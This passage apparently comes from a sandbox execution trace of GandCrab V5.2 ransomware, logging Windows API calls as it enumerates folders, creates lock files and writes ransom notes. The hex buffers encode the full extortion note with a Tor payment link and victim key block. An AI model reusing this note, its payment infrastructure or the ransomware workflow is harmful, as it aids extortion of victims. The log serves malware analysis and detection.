x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.129] WriteFile (in: hFile=0x2dc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e2fc*=0x2162, lpOverlapped=0x0) returned 1 [0079.129] CloseHandle (hObject=0x2dc) returned 1 [0079.130] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.130] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.130] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x18, wMilliseconds=0x1c4)) [0079.130] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.130] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.131] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.131] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\d2ca4a09d2ca4deb61a.lock") returned 118 [0079.131] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2dc [0079.132] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.132] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.132] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\") returned 94 [0079.132] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*" [0079.133] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*", fInfoLevelId=0x1, lpFindFileData=0x259e318, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e318) returned 0x503238 [0079.133] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.133] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0079.133] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.133] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.133] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0079.133] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0079.133] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0079.133] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\", lpString2="1033" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" [0079.133] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\" [0079.133] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.134] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.134] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.134] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.134] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.134] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.134] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.134] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.134] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.134] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.135] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.135] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\\\TITWMVJL-DECRYPT.txt") returned 120 [0079.135] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\1033\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0079.135] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6